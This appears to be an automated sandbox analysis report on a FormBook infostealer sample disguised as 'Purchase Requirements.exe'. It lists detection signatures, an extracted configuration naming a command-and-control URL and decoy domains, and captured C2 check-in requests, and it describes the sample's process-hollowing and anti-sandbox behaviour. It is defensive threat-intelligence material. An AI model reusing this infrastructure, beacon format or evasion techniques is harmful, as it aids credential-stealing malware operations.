Windows Analysis Report Purchase Requirements.exe

Overview

General Information

Sample Name: Purchase Requirements.exe
Analysis ID: 458827
MD5: 5bd387d81d1d7d7fd4dbeabebbb46b1b
SHA1: a832689604786e188bcc5c9020c28f693b2eb460
SHA256: fe7e173fd8a3d646508573bb2f7ef52f7efd25a8e2aef1b754dcf95ceb797f8a
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name recorded in the version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: Purchase Requirements.exe Virustotal: Detection: 33%
Source: Purchase Requirements.exe ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Purchase Requirements.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.MSBuild.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Purchase Requirements.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase Requirements.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000007.00000002.770164401.00000000013C0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.920589747.00000000043F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, colorcpl.exe
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop esi 7_2_00415806
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop esi 15_2_02B05806

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.narrowpathwc.com/n8ba/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.thefitflect.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.braun-mathematik.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.mariasmoworldwide.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.goldenstatelabradoodles.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.mynjelderlaw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.narrowpathwc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.teamtacozzzz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp HTTP/1.1 Host: www.theredcymbalsco.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.138
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.8.70
Source: unknown DNS traffic detected: queries for: www.thefitflect.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Tue, 03 Aug 2021 17:27:40 GMT Server: Apache X-Powered-By: PHP/7.4.21 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/" Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase Requirements.exe
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004181C0 NtCreateFile, 7_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00418270 NtReadFile, 7_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004182F0 NtClose, 7_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004183A0 NtAllocateVirtualMemory, 7_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041826C NtReadFile, 7_2_0041826C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00418215 NtCreateFile, 7_2_00418215
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004182EA NtClose, 7_2_004182EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_01429910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014299A0 NtCreateSection,LdrInitializeThunk, 7_2_014299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429840 NtDelayExecution,LdrInitializeThunk, 7_2_01429840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01429860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014298F0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_014298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A50 NtCreateFile,LdrInitializeThunk, 7_2_01429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A00 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_01429A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A20 NtResumeThread,LdrInitializeThunk, 7_2_01429A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429540 NtReadFile,LdrInitializeThunk, 7_2_01429540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014295D0 NtClose,LdrInitializeThunk, 7_2_014295D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429710 NtQueryInformationToken,LdrInitializeThunk, 7_2_01429710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429FE0 NtCreateMutant,LdrInitializeThunk, 7_2_01429FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429780 NtMapViewOfSection,LdrInitializeThunk, 7_2_01429780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014297A0 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_014297A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_01429660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014296E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_014296E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429950 NtQueueApcThread, 7_2_01429950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014299D0 NtCreateProcessEx, 7_2_014299D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142B040 NtSuspendThread, 7_2_0142B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429820 NtEnumerateKey, 7_2_01429820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014298A0 NtWriteVirtualMemory, 7_2_014298A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429B00 NtSetValueKey, 7_2_01429B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142A3B0 NtGetContextThread, 7_2_0142A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A10 NtQuerySection, 7_2_01429A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429A80 NtOpenDirectoryObject, 7_2_01429A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429560 NtWriteFile, 7_2_01429560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429520 NtWaitForSingleObject, 7_2_01429520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142AD30 NtSetContextThread, 7_2_0142AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014295F0 NtQueryInformationFile, 7_2_014295F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429760 NtOpenProcess, 7_2_01429760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429770 NtSetInformationFile, 7_2_01429770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142A770 NtOpenThread, 7_2_0142A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0142A710 NtOpenProcessToken, 7_2_0142A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429730 NtQueryVirtualMemory, 7_2_01429730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429650 NtQueryValueKey, 7_2_01429650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429670 NtQueryInformationProcess, 7_2_01429670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01429610 NtEnumerateValueKey, 7_2_01429610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014296D0 NtCreateKey, 7_2_014296D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459840 NtDelayExecution,LdrInitializeThunk, 15_2_04459840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04459860
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459540 NtReadFile,LdrInitializeThunk, 15_2_04459540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_04459910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044595D0 NtClose,LdrInitializeThunk, 15_2_044595D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044599A0 NtCreateSection,LdrInitializeThunk, 15_2_044599A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459650 NtQueryValueKey,LdrInitializeThunk, 15_2_04459650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A50 NtCreateFile,LdrInitializeThunk, 15_2_04459A50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04459660
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044596D0 NtCreateKey,LdrInitializeThunk, 15_2_044596D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044596E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_044596E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459710 NtQueryInformationToken,LdrInitializeThunk, 15_2_04459710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459FE0 NtCreateMutant,LdrInitializeThunk, 15_2_04459FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459780 NtMapViewOfSection,LdrInitializeThunk, 15_2_04459780
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445B040 NtSuspendThread, 15_2_0445B040
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459820 NtEnumerateKey, 15_2_04459820
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044598F0 NtReadVirtualMemory, 15_2_044598F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044598A0 NtWriteVirtualMemory, 15_2_044598A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459950 NtQueueApcThread, 15_2_04459950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459560 NtWriteFile, 15_2_04459560
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459520 NtWaitForSingleObject, 15_2_04459520
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445AD30 NtSetContextThread, 15_2_0445AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044599D0 NtCreateProcessEx, 15_2_044599D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044595F0 NtQueryInformationFile, 15_2_044595F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459670 NtQueryInformationProcess, 15_2_04459670
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A00 NtProtectVirtualMemory, 15_2_04459A00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459610 NtEnumerateValueKey, 15_2_04459610
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A10 NtQuerySection, 15_2_04459A10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A20 NtResumeThread, 15_2_04459A20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459A80 NtOpenDirectoryObject, 15_2_04459A80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459760 NtOpenProcess, 15_2_04459760
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459770 NtSetInformationFile, 15_2_04459770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445A770 NtOpenThread, 15_2_0445A770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459B00 NtSetValueKey, 15_2_04459B00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445A710 NtOpenProcessToken, 15_2_0445A710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04459730 NtQueryVirtualMemory, 15_2_04459730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044597A0 NtUnmapViewOfSection, 15_2_044597A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445A3B0 NtGetContextThread, 15_2_0445A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B082F0 NtClose, 15_2_02B082F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B08270 NtReadFile, 15_2_02B08270
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B083A0 NtAllocateVirtualMemory, 15_2_02B083A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B081C0 NtCreateFile, 15_2_02B081C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B082EA NtClose, 15_2_02B082EA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B08215 NtCreateFile, 15_2_02B08215
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0826C NtReadFile, 15_2_02B0826C
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase Requirements.exe Code function: 0_2_00504C65 0_2_00504C65
Source: C:\Users\user\Desktop\Purchase Requirements.exe Code function: 0_2_02739990 0_2_02739990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00401030 7_2_00401030
